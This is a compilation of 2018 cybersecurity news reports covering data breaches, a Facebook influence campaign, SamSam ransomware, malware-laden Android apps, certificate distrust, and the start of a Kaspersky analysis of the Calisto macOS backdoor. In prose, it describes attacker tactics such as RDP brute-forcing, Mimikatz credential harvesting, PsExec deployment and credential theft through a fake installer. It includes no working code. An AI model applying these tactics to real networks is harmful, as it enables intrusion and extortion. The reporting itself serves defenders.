“After investigating all those malicious PE files, we found that there is one PE file which infects most of the Android apps, and the malicious activity of that PE file is key logging.” continues the analysis.

“On a Windows system, this key logger attempts to log keystrokes, which can include sensitive information like credit card numbers, social security numbers and passwords.”

Google play store infected apps

The attackers attempted to conceive the PE files by using fake names that look like legitimate, such as Android.exe, my music.exe, COPY_DOKKEP.exe, js.exe, gallery.exe, images.exe, msn.exe and css.exe.

The researchers discovered that not all the apps uploaded by the same developers were infected with the malicious files, likely because they were using different development platform for the apps.

“The malicious PE files cannot directly run on the Android hosts. However, if the APK file is unpacked on a Windows machine and the PE files are accidentally executed, or the developers also issue Windows-based software, or if the developers are infected with malicious files runnable on Android platforms, the situation will go much worse.” concludes Palo Alto Networks.

“The development environment is a critical part of the software development life cycle. We should always try to secure it first. Otherwise other security countermeasures could just be attempts in vain,”

Facebook reported and blocked attempts to influence campaign ahead of midterms US elections
2.8.2018 securityweek 

Facebook removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the midterm US elections
Facebook has removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the forthcoming midterm US elections.

Facebook midterm US elections

Facebook is shutting down content and accounts “engaged in coordinated inauthentic behavior”

At the time there is no evidence that confirms the involvement of Russia, but intelligence experts suspect that Russian APT groups were behind the operation.

Facebook founder Mark Zuckerberg announced its response to the recently disclosed abuses.

“One of my top priorities for 2018 is to prevent misuse of Facebook,” Zuckerberg said on his own Facebook page.

“We build services to bring people closer together and I want to ensure we’re doing everything we can to prevent anyone from misusing them to drive us apart.”

According to Facebook, “some of the activity is consistent” with Tactics, Techniques and Procedures (TTPs) associated with the Internet Research Agency that is known as the Russian troll farm that was behind the misinformation campaign aimed at the 2016 Presidential election.

“But we don’t believe the evidence is strong enough at this time to make public attribution to the IRA,” Facebook chief security officer Alex Stamps explained to the reporters.

Facebook revealed that some 290,000 users followed at least one of the blocked pages.

“Resisters” enlisted support from real followers for an August protest in Washington against the far-right “Unite the Right” group.

According to Facebook, fake pages that were created more than a year ago, in some cases the pages were used to promote real-world events, two of them have taken place.

Just after the announcement, the US Government remarked it will not tolerate any interference from foreign states.

“The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation-state or other malicious actors,” deputy press secretary Hogan Gidley told reporters.

The investigation is still ongoing, but the social media giant decided to disclose early findings to shut down the orchestrated misinformation campaign.

Nathaniel Gleicher, Head of Cybersecurity Policy at Facebook, explained that the threat actors used VPNs and internet phone services to protect their anonymity.

“In total, more than 290,000 accounts followed at least one of these Pages, the earliest of which was created in March 2017. The latest was created in May 2018.
The most followed Facebook Pages were “Aztlan Warriors,” “Black Elevation,” “Mindful Being,” and “Resisters.” The remaining Pages had between zero and ten followers, and the Instagram accounts had zero followers.
There were more than 9,500 organic posts created by these accounts on Facebook and one piece of content on Instagram.
They ran about 150 ads for approximately $11,000 on Facebook and Instagram, paid for in US and Canadian dollars. The first ad was created in April 2017, and the last was created in June 2018.
The Pages created about 30 events since May 2017. About half had fewer than 100 accounts interested in attending. The largest had approximately 4,700 accounts interested in attending, and 1,400 users said that they would attend.” said Gleicher.
Facebook announced it would start notifying users that were following the blocked account and users who said would attend events created by one of the suspended accounts and pages

Facebook reported its findings to US law enforcement agencies, Congress, and other tech companies.

“Today’s disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity,” declared the Senate Intelligence Committee’s top Democrat Mark Warner.

Ten years ago someone breached into a server of the Yale University
2.8.2018 securityweek Incindent

Ten years ago someone breached into a server of the Yale University, but because the intrusion happened nearly ten years ago there is much more information about how it occurred.
After ten years, Yale University revealed a security breach that exposed an archive containing personal information of 119,000 people.

Hackers breached into the database of the famous University between April 2008 and January 2009 and apparently accessed a server where it is hosted a single database.

“On July 26th and 27th, Yale mailed notices to members of the Yale community, including alumni/ae, faculty members, and staff members, who were affected by a data intrusion that occurred in 2008-2009.” reads the security alert published by the Yale University.

yale university

The database contained data of individuals affiliated with the university, the unauthorized access was discovered on June 16, 2018, during a security review.

The hackers accessed names, Social Security numbers, dates of birth, Yale email addresses, and in some cases the physical addresses of individuals associated with the university.

Unfortunately, there is no way to understand how attackers hacked the server either “it is not feasible to determine the identities of the perpetrators.”

The academic institution announced that no financial information was exposed, it sent a notice letter to 97% of affected people in the Yale community.

Unfortunately, there is another disconcerting news for the Yale community, a letter sent by the University to the State of New Hampshire Attorney General, revealed that the same server was hacked a second time between March 2016 and June 2018.

This second intrusion caused the exposure of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale is offering identity monitoring services to all affected U.S. residents through the Kroll security firm. At the time there is no indication that the exposed data has been misused.

Reddit discloses a data breach, a hacker accessed user data
2.8.2018 securityweek Incindent

Reddit Warns Users of Data Breach
Reddit is warning its users of a security breach, an attacker broke into the systems of the platform and accessed user data.
Reddit is warning its users of a security breach, a hacker broke into the systems of the platform and accessed user data.

The hacker accessed user data, email addresses, and a 2007 backup database containing hashed passwords managed by the platform.

The data breach was discovered on June 19, 2018, according to Reddit, between June 14 and 18, 2018, the attacker compromised some of the employees’ accounts with the company cloud and source code hosting providers.

“A hacker broke into a few of Reddit’s systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords. Since then we’ve been conducting a painstaking investigation to figure out just what was accessed, and to improve our systems and processes to prevent this from happening again.” reads a data breach notification published by the company.

Reddit users that are still using the same password since 2007 have to do it now and change the password for any service where they share the same login credentials.

The hacker did not gain write access to Reddit systems containing backup data, source code, and other logs.

The company explained that the accounts were protected with two-factor SMS-based authentication, a circumstance that suggests the attackers were in the position to intercept authentication codes sent via SMS.

“Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA.” continues Reddit.

reddit data breach

The company has taken steps to lock down and rotate all production secrets and API keys, and to enhance our monitoring systems.

Reddit already reported the security breach to law enforcement and is notifying affected urging to change their passwords.

Let me close with this Q&A published by Reddit:

What information was involved?

Since June 19, we’ve been working with cloud and source code hosting providers to get the best possible understanding of what data the attacker accessed. We want you to know about two key areas of user data that was accessed:

All Reddit data from 2007 and before including account credentials and email addresses
What was accessed: A complete copy of an old database backup containing very early Reddit user data — from the site’s launch in 2005 through May 2007. In Reddit’s first years it had many fewer features, so the most significant data contained in this backup are account credentials (username + salted hashed passwords), email addresses, and all content (mostly public, but also private messages) from way back then.
How to tell if your information was included: We are sending a message to affected users and resetting passwords on accounts where the credentials might still be valid. If you signed up for Reddit after 2007, you’re clear here. Check your PMs and/or email inbox: we will be notifying you soon if you’ve been affected.
Email digests sent by Reddit in June 2018
What was accessed: Logs containing the email digests we sent between June 3 and June 17, 2018. The logs contain the digest emails themselves — they look like this. The digests connect a username to the associated email address and contain suggested posts from select popular and safe-for-work subreddits you subscribe to.
How to tell if your information was included: If you don’t have an email address associated with your account or your “email digests” user preference was unchecked during that period, you’re not affected. Otherwise, search your email inbox for emails from [noreply@redditmail.com](mailto:noreply@redditmail.com) between June 3-17, 2018.

Facebook Uncovers Political Influence Campaign Ahead of Midterms
1.8.2018 securityweek 

Facebook said Tuesday it shut down 32 fake pages and accounts involved in an apparent "coordinated" effort to stoke hot-button issues ahead of November midterm US elections, but could not identify the source although Russia is suspected of involvement.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied directly to Russian actors, who American officials say used the platform to spread disinformation ahead of the 2016 US presidential election.

The US intelligence community has concluded that Russia sought to sway the vote in Donald Trump's favor, and Facebook was a primary tool in that effort, using targeted ads to escalate political tensions and push divisive online content.

With the 2018 mid-terms barely three months away, Facebook founder Mark Zuckerberg announced his company's crackdown.

"One of my top priorities for 2018 is to prevent misuse of Facebook," Zuckerberg said on his own Facebook page.

"We build services to bring people closer together and I want to ensure we're doing everything we can to prevent anyone from misusing them to drive us apart."

Trump, now president, has repeatedly downplayed Kremlin efforts to interfere in US democracy.

Two weeks ago, he caused an international firestorm when he stood alongside Russian President Vladimir Putin and cast doubt on assertions that Russia tried to sabotage the vote.

But after Facebook's announcement, the White House stressed Trump opposed all efforts at election interference.

"The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation state or other malicious actors," deputy press secretary Hogan Gidley told reporters.

Facebook said "some of the activity is consistent" with that of the Saint Petersburg-based Internet Research Agency -- the Russian troll farm that managed many false Facebook accounts used to influence the 2016 vote.

"But we don't believe the evidence is strong enough at this time to make public attribution to the IRA," Facebook chief security officer Alex Stamps said during a conference call with reporters.

Special Counsel Robert Mueller is heading a sprawling investigation into possible collusion with Russia by Trump's campaign to tip the vote toward the real estate tycoon.

Mueller has indicted the Russian group and 12 Russian hackers connected to the organization.

Facebook said it is shutting down 32 pages and accounts "engaged in coordinated inauthentic behavior," even though it may never be known for certain who was behind the operation.

The tech giant's investigation is at an early stage, but was revealed now because one of the pages being covertly operated was orchestrating a counter-protest to a white nationalism rally in Washington.

The coordinators of a deadly white-supremacist event in Charlottesville last year reportedly have been given a permit to hold a rally near the White House on August 12, the anniversary of the 2017 gathering.

Facebook said it will notify members of the social network who expressed interest in attending the counter-protest.

- US 'not doing' enough -

Facebook has briefed US law enforcement agencies, Congress and other tech companies about its findings.

"Today's disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity," said the Senate Intelligence Committee's top Democrat Mark Warner.

The panel's chairman, Republican Senator Richard Burr, said he was glad to see Facebook take a "much-needed step toward limiting the use of their platform by foreign influence campaigns."

"The goal of these operations is to sow discord, distrust and division," he added. "The Russians want a weak America."

US lawmakers have introduced multiple bills aimed at boosting election security.

While top Senate Democrat Chuck Schumer applauded Facebook's action, he said the Trump administration itself "is not doing close to enough" to protect elections.

Some of the most-followed pages that were shut down included "Resisters" and "Aztlan Warriors."

Facebook said some 290,000 users followed at least one of the pages.

"Resisters" enlisted support from real followers for an August protest in Washington against the far-right "Unite the Right" group.

Inauthentic pages dating back more than a year organized an array of real world events, all but two of which have taken place, according to Facebook.

The news comes just days after Facebook suffered the worst single-day evaporation of market value for any company, after missing revenue forecasts for the second quarter and offering soft growth projections.

Zuckerberg's firm says the slowdown will come in part due to its new approach to privacy and security, which helped experts uncover these so-called "bad actors."

Mimecast Acquires Threat Detection Startup Solebit for $88 Million
1.8.2018 securityweek   IT

Email and data security firm Mimecast (NASDAQ: MIME) announced on Tuesday that it has acquired threat detection firm Solebit for approximately $88 million net of cash acquired.

Founded in 2014 by cybersecurity experts from the Israel Defense Forces (IDF), Solebit announced that it had raised $11 million in Series A funding in March 2018.

Solebit’s technology helps detect and protect against zero-day malware and unknown threats in data files and links to external resources/URLs.

“Security methods like signature-based antivirus and sandbox detonation are too limited when it comes to today’s most advanced threats,” said Peter Bauer, chief executive officer at Mimecast.

“Solebit has developed a differentiated approach that is engineered to preclude the need for signatures and sandboxes,” the company explains. “It is designed to help customers find advanced threats by recognizing when there is malicious code embedded within active content and data files.”

Mimecast says that Solebit’s threat detection tools are already integrated into Mimecast Targeted Threat Protection products.

London, UK-based Mimecast announced earlier this month that it had acquired Bethesda, Md-based security training company Ataata.

“Combined with the recent acquisition of Ataata in the security awareness and training space, and the recently previewed early adopter web security program, Solebit brings another important set of microservices to the Mime|OS platform that all of Mimecast’s unified services are built upon,” the company says.

Research by Mimecast and Vanson Bourne in May 2018 highlighted the extent to which humans are the targeted weakness in cybersecurity. From a pool of 800 IT decision makers and C-level executives, 94% had witnessed untargeted phishing attacks, 92% had witnessed spear-phishing attacks, 87% had witnessed financially-based email impersonation attacks (BEC), and 40% had seen an increase in trusted third-party impersonation attacks.

Founded by Bauer and CTO Neil Murray in 2003, Mimecast went public in late 2015 at $10 per share, raising $78 million in gross proceeds. After the IPO, share value fell as low as $6.20 in January 2016. Since July 2016, however, share price has risen steadily, sitting at $36.37 at the time of writing.

Investors in Solebit include ClearSky Security, MassMutual Ventures and Glilot Capital Partners.

HP Launches Bug Bounty Program for Printers
1.8.2018 securityweek  

HP announced on Tuesday the launch of a bug bounty program for printers. The company is prepared to pay out up to $10,000 for serious vulnerabilities found in its products.

The initiative, which HP calls the industry’s first printer bug bounty program, was launched in partnership with crowdsourced security platform Bugcrowd.HP launches printer bug bounty program

The program is private, which means not anyone can participate. Researchers invited by HP have been instructed to focus on firmware-level vulnerabilities, including remote code execution, cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs.

The rewards range between $500 and $10,000 per flaw, but HP is not disclosing the specific payouts for each type of issue. Researchers can also earn a reward if they report a vulnerability previously discovered by HP itself – the company describes this as a “good faith payment.”

The bug bounty program currently covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).

HP told SecurityWeek that currently it’s engaged with 34 researchers. The company says the program covers only endpoint devices – printer-related web domains are out of scope – with a focus on print firmware.

The company plans on expanding the program to its PC line soon, but it currently focuses on printers due to concerns that the technological advancements in this area make these types of devices an attractive target for malicious actors. HP noted that printers can not only provide access to the network that houses them, but they can also expose confidential documents.

“As we navigate an increasingly complex world of cyber threats, it’s paramount that industry leaders leverage every resource possible to deliver trusted, resilient security from the firmware up,” said Shivaun Albright, HP's Chief Technologist of Print Security. “HP is committed to engineering the most secure printers in the world.”

SamSam Ransomware: Patient, Persistent, Competent and Dangerous
1.8.2018 securityweek  

The SamSam ransomware has always been a bit different. Unlike many ransomware infections, its victims are targeted rather than random -- and the attacker establishes a presence on the victim network before beginning the encryption process.

Victims this year include the City of Atlanta, Allscripts, Adams Memorial Hospital, Colorado Department of Transportation and the Mississippi Valley State University. It could seem that SamSam targets health, education and government; but a new and detailed analysis of SamSam from Sophos shows this is not the case -- and its success rate is far higher than previously thought.

"Sophos have discovered that these three sectors account for fewer than half of the total number of organizations we believe have been victims of SamSam, and it's the private sector who have suffered the most (and disclosed the least)."

By following the money and tracking the Bitcoin payment wallets with help from Neutrino (a firm that specializes in tracking cryptocurrency flows), Sophos researchers have estimated that the SamSam attacker has netted more than $5.9 million dollars since version 1 (it is now at version 3) began being used in January 2016. The attacker is currently collecting an average of $300,000 per month. Sophos estimates that about 233 victims have paid a SamSam ransom.

The attacker is thought to be a single person working alone rather than a criminal or nation-state gang. He (or she) is proficient, although not perfect, in the English language; but probably comes from a country where English is not the first language. He does not boast about his exploits and has no known social media presence, where linguistic tells within has ransomware might provide clues to his identity. At this point, his identity and nationality are unknown.

Sophos researchers have tracked (PDF) the evolution of SamSam through its three versions. It shows a developer getting evermore proficient in his craft. The basic MO is to select the targets, possibly through publicly available search engines such as Shodan or Censys, to access the network, to elevate privilege and reconnoiter, and then encrypt everything he can access. The encryption itself is usually done overnight to reduce the chance of detection.

According to the researchers, version 3 usually affects entry through brute-forcing Windows RDP accounts. "While some may find this shocking," say the researchers, "a simple search on Shodan will reveal thousands of IP addresses accessible over port 3389, the default RDP port."

Once access to a domain user account is obtained, the attacker will typically use Mimikatz to harvest the credentials of the first domain admin to log on. This has been known on some occasions to take days, with the attacker simply waiting.

Armed with privileged access, the attacker starts to manually deploy the ransomware. First, he takes control of one of the victim's servers, which he uses as his command center. Then, he scans the network. If he can write a tiny text file to a computer's filesystem (called test.txt), the name of that file is added to a separate file stored on his command server and known as 'alive.txt'. "The attacker later uses this .txt file as a target list," report the researchers.

Deployment from the command server is usually done with the Sysinternals PsExec application, although the attacker has been known to switch to PowerAdmin's PaExec if the former is blocked. Once the attack is initiated, the attacker simply waits for payment.

One key element of SamSam is the extent to which stealth is used -- completely in keeping and supporting the attacker's low-profile approach to crime. "In version 3 of SamSam," say the reporters, "the general operation of the payload hasn't changed much since version 1, but the attackers have put significant efforts into creating a stealthier version of the malware."

One example of this is the order in which targeted files are encrypted -- anything smaller than 100 Mb immediately, and larger files in size order. SQL and MDF files (which are typically large and time-consuming to encrypt) are next; and finally, anything left that is not on an exclusion list. "This carefully curated approach enables the attacker to achieve a greater volume of encrypted files before the attack is spotted and interrupted."

Another example is the consistency with which the attacker deletes the files he uses one the device is encrypted, or if the attack is interrupted.

Payment is made in Bitcoin (BTC), and the attacker offers several initial options. Individual computers can be decrypted on payment of 0.8 BTC (as of July 2018). Full decryption -- regardless of the number of encrypted computers -- costs 7 BTC (around $40,000 at July 2018 exchange rates). Victims have 7 days to make payment; but there is at least one example of the victim being offered the option to reopen the countdown on payment of 0.5 BTC.

The bad news for victims is that there is no known way to recover SamSam encrypted files. The good news, if you can call it such, is that the attacker really does provide decryption, and even offers online support for those who have difficulties.

Sophos urges companies not to pay any ransom, but accepts the difficulties with SamSam. "Instead," say the researchers, "Sophos strongly recommends a comprehensive layered approach to security, to both avoid an initial attack, and enable system recovery through backups." However, they also note, "Securing an environment against a competent, persistent, and patient, human adversary is somewhat different from defending against the more conventional kinds of semi-automated, social engineering-driven threats more commonly seen in enterprise environments. And SamSam's own particularly damaging behavior sets it apart from many other ransomwares."

Mozilla Reinforces Commitment to Distrust Symantec Certificates
1.8.2018 securityweek Security 

Mozilla this week reaffirmed its commitment to distrust all Symantec certificates starting in late October 2018, when Firefox 63 is set to be released to the stable channel.

The browser maker had decided to remove trust in TLS/SSL certificates issued by the Certification Authority (CA) run by Symantec after a series of problems emerged regarding the wrongful issuance of such certificates.

Despite being one of the oldest and largest CAs, Symantec sold its certificate business to DigiCert after Internet companies, including Google and Mozilla, revealed plans to gradually remove trust in said certificates, even after DigiCert said it won’t repeat the same mistakes as Symantec.

The first step Mozilla took was to warn site owners about Symantec certificates issued before June 1, 2016, and encourage them to replace their TLS certificates.

Starting with Firefox 60, users see a warning when the browser encounters websites using certificates issued before June 1, 2016 that chain up to a Symantec root certificate.

According to Mozilla, less than 0.15% of websites were impacted by this change when Firefox 60 arrived in May. Most site owners were receptive and replaced their old certificates.

“The next phase of the consensus plan is to distrust any TLS certificate that chains up to a Symantec root, regardless of when it was issued […]. This change is scheduled for Firefox 63,” Mozilla’s Wayne Thayer notes in a blog post.

That browser release is currently planned for October 23, 2018 (it will arrive in Beta on September 5).

At the moment, around 3.5% of the top 1 million websites are still using Symantec certificates that will be impacted by the change. While the number is high, it represents a 20% improvement over the past two months, and Mozilla is confident that site owners will take action in due time.

“We strongly encourage website operators to replace any remaining Symantec TLS certificates immediately to avoid impacting their users as these certificates become distrusted in Firefox Nightly and Beta over the next few months,” Thayer concludes.

Google too is on track to distrust all Symantec certificates on October 23, 2018, when Chrome 70 is expected to land in the stable channel. Released in April, Chrome 66 has already removed trust in certificates issued by Symantec's legacy PKI before June 1, 2016.

DHS Unveils National Risk Management Center
1.8.2018 securityweek   BigBrothers

Kirstjen Nielsen introduces National Risk Management Center

Secretary of Homeland Security Kirstjen Nielsen said on Tuesday that the U.S. Department of of Homeland Security (DHS) has launched The National Risk Management Center, a joint center housed within DHS that will enable the private sector and government to collaborate and devise solutions to reduce risk to critical infrastructure.

Announced at the DHS National Cybersecurity Summit today in New York City, the new center will focus on three things:

● Identify, assess, and prioritize efforts to reduce risks to national critical functions, which enable national and economic security;

● Collaborate on the development of risk management strategies and approaches to manage risks to national functions; and

● Coordinate integrated cross-sector risk management activities.

According to the DHS, the center will lead a series of activities that will help “define what is truly critical; create the frameworks by which government and industry collectively manage risk; and initiate specific cross-sector activities to address known threats.”

Notable attendees and participants at the Summit include, Vice President Mike Pence, Secretary of Energy Rick Perry, FBI Director Christopher Wray, Commander, U.S. Cyber Command and Director, National Security Agency General Paul M. Nakasone.

A live stream of the event can be watched online throughout the day.

Android Apps Carrying Windows Malware Yanked From Google Play
1.8.2018 securityweek   Android

Google recently removed 145 applications from Google Play after they were found to carry malicious Windows executables inside, Palo Alto Networks reveals.

Most of the infected applications, Palo Alto's researchers say, were uploaded to the application store between October and November 2017 and remained there for over half a year. Google removed all of them after being alerted on the issue.

While not representing a threat to the Android users who downloaded and installed them, the malicious code within these APKs is proof of the dangers posed by supply chain attacks: the software developers built these applications on compromised Windows systems.

Some of the infected Android applications had over 1000 downloads and 4-star ratings before being removed from Google Play.

The security researchers discovered that some of the infected APKs contained multiple malicious PE files at different locations, with different names. However, two malicious files were found embedded in most applications.

One of the files was present in 142 APKs, while the second had infected 21 APKs. The security firm also found 15 apps with both PE files inside, as well as some APKs with a number of other malicious PE files inside.

The researchers also note that one malicious PE file that infected most of the Android apps was a keylogger. The malicious program attempted to log keystrokes, including sensitive information like credit card numbers, social security numbers and passwords.

To appear legitimate, these files use fake names, including Android.exe, my music.exe, COPY_DOKKEP.exe, js.exe, gallery.exe, images.exe, msn.exe and css.exe.

When executed on Windows systems, the malicious PE files would create executable and hidden files in Windows system folders, including copies of themselves, would change Windows registry to auto-start after system restart, would attempt to sleep for long periods of time, and also showed suspicious network connection activities to IP address via port 8829.

“Interestingly, we saw a mixture of infected and non-infected apps from the same developers. We believe the reason might be that developers used different development environment for different apps,” Palo Alto Networks says.

The malicious PE files cannot directly run on Android devices, but, if the APK is unpacked on a Windows machine and malicious code executed, the system becomes infected. As Palo Alto Networks points out, the situation could become much worse if the developers are infected with malicious files that can run on Android.

“The development environment is a critical part of the software development life cycle. We should always try to secure it first. Otherwise other security countermeasures could just be attempts in vain,” the security firm concludes.

Medical System Notifies 1.4M Patients About Computer Breach
1.8.2018 securityweek   Incindent

A major Iowa hospital and medical clinic system has notified about 1.4 million patients and former patients about a computer breach that might have exposed their personal information.

UnityPoint Health officials say hackers used broke into the company's email system and could have obtained medical information.

UnityPoint's privacy officer, RaeAnn Isaacson, said Monday the company isn't aware of any misuse of patient information related to the incident. But she says the company is telling patients what UnityPoint is doing to address the situation and what patients can do to help protect their information.

The company says the hackers also might have obtained some patients' financial information.

UnityPoint say that after the problem was discovered May 31, it hired outside experts and notified the FBI.

SamSam Ransomware operators earned more than US$5.9 Million since late 2015
1.8.2018 securityaffairs 

The security experts from Sophos have published a report on the multimillion-dollar black market business for crooks, they analyzed the SamSam ransomware case as a case study.

The researchers that have tracked Bitcoin addresses managed by the crime gang discovered that crooks behind the SamSam ransomware had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

“In total, we have now identified 157 unique addresses which have received ransom payments as well as 89 addresses which have been used on ransom notes and sample files but, to date, have not received payments,” continues the report published by Sophos.

“By analyzing the payments, and comparing this with ransom notes at the time, we can estimate the number of individual victims who have chosen to pay at least some of the ransom amount stands at 233 as of July 19th 2018. With an estimated 1 new victim being attacked each day, we believe that roughly 1 in 4 victims pay at least some of the ransom. “

SamSam report 1
SamSam ransomware payments

The attackers deploy the SamSam ransomware manually by compromising RDP on the target machine, this aspect makes SamSam infections different from the ones associated with other ransomware that leverages spam campaigns or malvertising.

The attackers carry on brute-force attacks on RDP of the target system, some time they leverage credentials obtained from other data breaches typically offered for sale on the dark web.

Once compromised a system inside the targeted organization, the SamSam search for other machines to infect while stealing credentials.

When operators discover a potential target they manually deploy SamSam using tools like PSEXEC and batch scripts.

The following diagram shows the different steps of the latest SamSam variant for which the initial infection vector is still unclear.

SamSam new variant

Once infected the largest number of systems in the targeted organization, operators attempt to offer a complete clean up of the infected systems for a special price.

The highest estimate has been US$850,000 worth of bitcoin for the decryption keys.

The encryption process first involves most valuable data thanks to a multi-tiered priority system, SamSam ransomware doesn’t encrypt Windows system-related files.

Since its discovery, the SamSam ransomware targeted large organizations, including hospitals and educational institutions.

Sophos provides the following recommendations to secure the network of organizations against the SamSam ransomware:

regularly patch against known vulnerabilities for the applications and operating systems;
keep regular backups;
use multi-factor authentication;
restrict access to RDP(on port 3389);

Dixons Carphone Data Breach discovered in June affected 10 Million customers
1.8.2018 securityaffairs  Incindent

Dixons Carphone announced on Monday that the security breach discovered in June affected around 10 million customers, much more than the initial estimate.
Dixons Carphone, one of the largest European consumer electronics and telecommunication retailers, suffered a major data breach in 2017, but new data related to the incident have been shared.

The situation was worse than initially thought, the company announced on Monday that the security breach affected around 10 million customers, much more than the initial estimate.

“Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017.” reads a statement published by the company.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated.”

Dixons Carphone discovered in June 2017 an “unauthorised access” to certain data held by the company, it promptly launched an investigation and hired an external firm to shed the light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

Hackers may have accessed personal information of the affected customers including their names, addresses and email addresses last year.
In June it was estimated that hackers accessed data of 1.2 million people and 5.9 million payments cards used at Currys PC World and Dixons Travel were exposed.

Dixons Carphone assured its customers that no financial data was exposed (pin codes, card verification values and authentication data).

“As a precaution, we are choosing to communicate to all of our customers to apologize and advise them of protective steps to minimize the risk of fraud,” continues the statement. “We are continuing to keep the relevant authorities updated.”

Dixons Carphone hack

The company announced further security measure to protect its system and confirmed that all necessary action to lock put the attackers have been taken.
“We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring, and testing,” Dixons said.

This isn’t the first time that the company suffers a security breach, in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are anyway potentially exposed to phishing attacks and have to be vigilant

Ransomware attack against COSCO spread beyond its US network to Americas
1.8.2018 securityaffairs 

New revelations on the attack against COSCO confirm it was worse than initially thought, the ransomware spread beyond the US network.
Chinese shipping giant COSCO recently suffered a ransomware attack that disrupted some systems of the company in the United States.

The shipping company quickly isolates the systems to avoid propagation to other regions and started an internal investigation, the firm confirmed that the incident did not affect operations of the fleet.

“After the network security problem in the Americas has been detected, to protect the interests of our customers, we have taken proactive measures to isolate internal networks to carry out technical inspections on global scale.” COSCO said in an official statement. “With the reliable confirmation from the technical experts that the networks in all other regions are secure, the network applications were recovered at 16:00 (Beijing Time) on 25th July in all the regions except the Americas. As of now, all the business operations have been back to normal in the regions with network recovered.”

New revelations on the attack confirm it was worse than initially thought, the malicious code spread beyond the US network of the company and infected systems in other countries, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.

“Chinese shipping giant COSCO said a ransomware attack has spread beyond its US network to the broader Americas, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.” reported the CBR website.

“That’s according to maritime intelligence house Lloyds List, which has reported that customers were also said to be facing issues in the UK and Turkey.”

Due to local network breakdown within the America regions, local email and network telephone were not able to work properly at the moment of the attack.

The attack on the world’s largest shipping company by dry weight tonnage has taken out emails and phones.

The company published a list of alternative Yahoo! email addresses to its customers for ordinary communications.

Security experts warned that COSCO fleet could still be at risk following the attack.

“Although COSCO has been quick to respond to this hack, the virus may have been dormant for some time, so I would not be surprised if other systems – shore- and ship-based systems – have been breached. We strongly recommend to whoever discovered the attack to thoroughly verify the breach has been contained and has not infected any ships in the COSCO fleet.” Maritime cybersecurity specialists Naval Dome told IHS Fairplay:

The ransomware attack against COSCO doesn’t appear severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

Calisto Trojan for macOS

31.7.2018 Kaspersky Apple
The first member of the Proton malware family?
An interesting aspect of studying a particular piece of malware is tracing its evolution and observing how the creators gradually add new monetization or entrenchment techniques. Also of interest are developmental prototypes that have had limited distribution or not even occurred in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.

Malware for macOS is not that common, and this sample was found to contain some suspiciously familiar features. So we decided to unpick Calisto to see what it is and why its development was stopped (or was it?).

We have no reliable information about how the backdoor was distributed. The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac. Interestingly, Calisto’s authors chose the ninth version of the program as a cover which is still relevant.

For illustrative purposes, let’s compare the malware file with the version of Mac Internet Security X9 downloaded from the official site.

Backdoor Intego Mac Internet Security 2018
Unsigned Signed by Intego

It looks fairly convincing. The user is unlikely to notice the difference, especially if he has not used the app before.

As soon as it starts, the application presents us with a sham license agreement. The text differs slightly from the Intego’s one — perhaps the cybercriminals took it from an earlier version of the product.

Next, the “antivirus” asks for the user’s login and password, which is completely normal when installing a program able to make changes to the system on macOS.

But after receiving the credentials, the program hangs slightly before reporting that an error has occurred and advising the user to download a new installation package from the official site of the antivirus developer.

The technique is simple, but effective. The official version of the program will likely be installed with no problems, and the error will soon be forgotten. Meanwhile, in the background, Calisto will be calmly getting on with its mission.

Analysis of the Trojan
With SIP enabled
Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions. Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.

Calisto’s activity can be investigated using its child processes log and decompiled code:

Log of commands executed by the Trojan during its operation

Hardcoded commands inside the Calisto sample

We can see that the Trojan uses a hidden directory named .calisto to store:

Keychain storage data
Data extracted from the user login/password window
Information about the network connection
Data from Google Chrome: history, bookmarks, cookies
